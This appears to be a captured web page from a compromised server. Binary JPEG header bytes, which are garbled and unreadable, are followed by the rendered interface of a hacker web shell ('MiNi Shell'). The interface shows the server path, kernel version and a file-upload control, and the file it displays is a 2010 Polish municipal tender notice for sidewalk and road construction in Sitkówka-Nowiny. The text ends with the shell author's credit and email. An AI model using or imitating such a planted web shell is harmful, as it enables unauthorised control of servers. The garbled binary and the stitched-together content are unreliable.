JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100304/59732-N-2010.html

<p class="kh_header"><b>Sitkówka: Budowa chodników i dróg w ramach rewitalizacji Osiedla Nowiny - IV ETAP, rejon budynków Nr 11,13,15,17,19 przy ul. Białe Zagłębie i budynków Nr 7 i 9 przy ul. Szkolnej,  Gmina Sitkówka-Nowiny,  województwo świętokrzyskie</b><br>
<b>Numer ogłoszenia: 59732 - 2010; data zamieszczenia: 04.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sitkówka - Nowiny , ul. Białe Zagłębie 25, 26-052 Sitkówka, woj. świętokrzyskie, tel. 041 3475000, faks 041 3475011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowiny.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodników i dróg w ramach rewitalizacji Osiedla Nowiny - IV ETAP, rejon budynków Nr 11,13,15,17,19 przy ul. Białe Zagłębie i budynków Nr 7 i 9 przy ul. Szkolnej,  Gmina Sitkówka-Nowiny,  województwo świętokrzyskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie 
    chodników i dróg w ramach rewitalizacji Osiedla Nowiny - IV ETAP, rejon budynków 
    Nr 11,13,15,17,19 przy ul. Białe Zagłębie i budynków Nr 7 i 9 przy ul. Szkolnej, wraz 
    kanalizacją deszczową.
    ( Zadanie inwestycyjne jest częścią zamówienia realizowanego w ramach Projektu 
      Rewitalizacji miejscowości Nowiny-Zagrody)

2. Zakres zamówienia obejmuje m.in.: 
2.1. Część drogowa:
1) Rozebranie mechaniczne nawierzchni z mieszanek mineralno - bitumicznych o gr. 5 cm	- 3 941,38 m2
2) Rozebranie mechaniczne podbudowy betonowej o gr. 15 cm 					- 3 323,38 m2
3) Rozebranie krawężników betonowych o wymiarach 15x30 cm,
    na podsypce cementowo - piaskowej								- 1 414,87 m
4) Rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych 
    50x50x7cm, na podsypce piaskowej								- 1 180,09 m
5) Rozebranie obrzeży trawnikowych na podsypce piaskowej o wymiarach 6x20 cm		- 1 140,84 m2
6) Rozebranie nawierzchni z płyt drogowych betonowych o grubości 15 cm z wypełnieniem 
    spoin zaprawą cementową									- 1 689,88 m2
7) Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,40 m3 
    z transportem urobku samochodami samowyładowawczymi o ładowności do 5t na odległość 
    do 1 km: grunt kat.IV										- 3 113,79 m3
8) Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,25 m3 
    z transportem urobku samochodami samowyładowawczymi o ładowności do 5t na odległość 
    do 1 km: grunt kat.IV										-    954,31 m3
9) Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni
    - kategoria gruntu: I-IV							 		- 9 085,50 m2
10) Podbudowa z gruntu stabilizowanego cementem, wykonywana mieszarkami doczepnymi 
     o grubości podbudowy po zagęszczeniu: 15 cm						- 8 798,15 m2
11) Mechaniczne wykonanie koryt na całej szerokości jezdni i chodników w gruncie kategorii I-IV, 
     o głębokości ponad 20 cm 									-36 735,24 m2
12) Podbudowy z kruszywa łamanego - warstwa dolna o grubości po zagęszczeniu: 15 cm	- 2 001,52 m2
13) Podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu: 7 cm 	- 1 556,87 m2
14) Podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu : 8 cm 	- 6 480,22 m2
15) Nawierzchnie z kostki brukowej betonowej o grubości: 8cm - szarej, na posypce 
     cementowo-piaskowej									- 5 349,61 m2
16) Nawierzchnie z kostki brukowej betonowej o grubości: 8 cm - kolorowej, na podsypce
     cementowo-piaskowej									- 2 687,48 m2
17) Krawężniki betonowe wystające, o wymiarach 15x30cm - na podsypce
     cementowo - piaskowej									- 1 792,62 m 18) Krawężniki betonowe wtopione, o wymiarach: 12x25 cm - na podsypce 
     cementowo - piaskowej									-      533,98 m
19) Nawierzchnie z kostki brukowej betonowej o grubości: 8 cm - kolorowej, 
     na podsypce cementowo - piaskowej   							-  1 333,06 m2
20) Obrzeża betonowe 30x8cm, na podsypce: piaskowej, z wypełnieniem spoin 
     zaprawą cementową 									- 1 028,10 m
21) Wykonanie schodów terenowych 								-     42,00 m2

2.2. Część instalacyjna:
1) Roboty ziemne										-    740,47 m3
2) Kanały z rur kanalizacyjnych PCW łączonych na wcisk / rury łącznie z uszczelką/,
    o średnicy zewnętrznej: 250 mm 								-      35,00 m
3) Kanały z rur kanalizacyjnych PCW łączonych na wcisk / rury łącznie z uszczelką/,
    o średnicy zewnętrznej: 200 mm								-     185,00 m
4) Ustawienie studni rewizyjnej z kręgów betonowych, w gotowym wykopie, o głębokości 3,0m
    - średnica kręgów: 1200 mm 									-       4,00 szt
5) Wpusty deszczowe										-      20,00 szt
6) Odwodnienie liniowe Super KS 200 								-      85,00 m
7) Studzienki Super KS200									-        5,00 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.30.00-9, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie 20.000,00 zł ( słownie złotych: dwadzieścia tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku o którym mowa w pkt. VIII ppkt. 1 b) 2) SIWZ, Zamawiający uzna 
       wykazanie, iż Wykonawca w okresie ostatnich pięciu lat przed upływem terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
       wykonał co najmniej dwie roboty budowlane odpowiadające swoim rodzajem 
       robotom stanowiącym przedmiot zamówienia, z których każda była o wartości 
       brutto minimum 1 000 000,00 zł i obejmowała swoim zakresem budowę, 
       przebudowę lub remont dróg, chodników, placów lub parkingów. 

       Spełnienie tego warunku Zamawiający będzie oceniał na podstawie dokumentów i      
       oświadczeń, o których mowa w pkt. X ppkt. 3 b) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie oświadczenia o którym mowa w pkt. X ppkt. 3 a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku o którym mowa w pkt. VIII ppkt. 1 b) 3) SIWZ, Zamawiający uzna 
       wskazanie, iż Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, tj. 
       posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w 
       następujących specjalnościach:

a)	drogowej - jedną osobą posiadającą uprawnienia budowlane do kierowania 
robotami w specjalności drogowej ( kierownik budowy).
Osoba przeznaczona na to stanowisko musi posiadać uprawnienia budowlane do   kierowania robotami w specjalności drogowej, potwierdzone stosownymi decyzjami, o    których mowa w Ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2003 r. Nr 207    poz. 2016 z późniejszymi zm.) lub inne ważne uprawnienia do kierowania robotami    budowlanymi w specjalności drogowej, wydane na podstawie wcześniej obowiązujących   przepisów.

b)	instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych - jedną osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych (kierownik robót).
   Osoba przeznaczona na to stanowisko musi posiadać uprawnienia budowlane do   kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych, potwierdzone stosownymi decyzjami, o  których mowa w Ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2003 r. Nr 207 
poz. 2016 z późniejszymi zm.) lub inne ważne uprawnienia do kierowania robotami  budowlanymi w specjalności instalacyjnej, wydane na podstawie wcześniej obowiązujących  przepisów. 

       Spełnienie tego warunku Zamawiający będzie oceniał na podstawie dokumentów i      
       oświadczeń, o których mowa w pkt. X ppkt. 3 c) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie oświadczenia o którym mowa w pkt. X ppkt. 3 a) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Pzp dopuszcza się zmiany postanowień zawartej umowy w stosunku do treści oferty na następujących warunkach:

1) W przypadku wystąpienia warunków pogodowych uniemożliwiających, ze  
    względów technologicznych prowadzenie robót - pomimo dołożenia przez 
    Wykonawcę wszelkich starań aby roboty mogły zostać zrealizowane zgodnie z 
    harmonogramem rzeczowo - finansowym  - strony przewidują możliwość 
    wydłużenia terminu realizacji przedmiotu umowy, o którym mowa w § 5 ust. 1 
    projektu umowy po wprowadzeniu stosownych zmian do umowy w formie aneksu 
    do umowy podpisanego przez obie strony - z zastrzeżeniem, iż okres wydłużenia    
    terminu realizacji przedmiotu umowy nie może być dłuższy niż okres trwania w/w 
    warunków pogodowych powodujących brak możliwości prowadzenia robót.


2) W przypadku konieczności wykonania zamówień dodatkowych, niemożliwych 
    wcześniej do przewidzenia, które będą niezbędne do prawidłowego wykonania 
    przedmiotu niniejszej umowy i których wykonanie spowoduje konieczność 
    wydłużenia terminu realizacji przedmiotu niniejszej umowy, strony przewidują    
    możliwość wydłużenia terminu realizacji przedmiotu umowy, o którym mowa w § 5 
    ust. 1 projektu umowy po wprowadzeniu stosownych zmian do umowy w formie 
    aneksu do umowy podpisanego przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowiny.com.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sitkówka - Nowiny ul. Białe Zagłębie 25, 26-052 Sitkówka, Referat Budownictwa, Zagospodarowania Przestrzennego, Gospodarki Komunalnej, Drogownictwa i Inwestycji, pok. Nr 37 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 10:00, miejsce: Urząd Gminy Sitkówka - Nowiny ul. Białe Zagłębie 25 26-052 Sitkówka, Sekretariat, pok. Nr 26 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com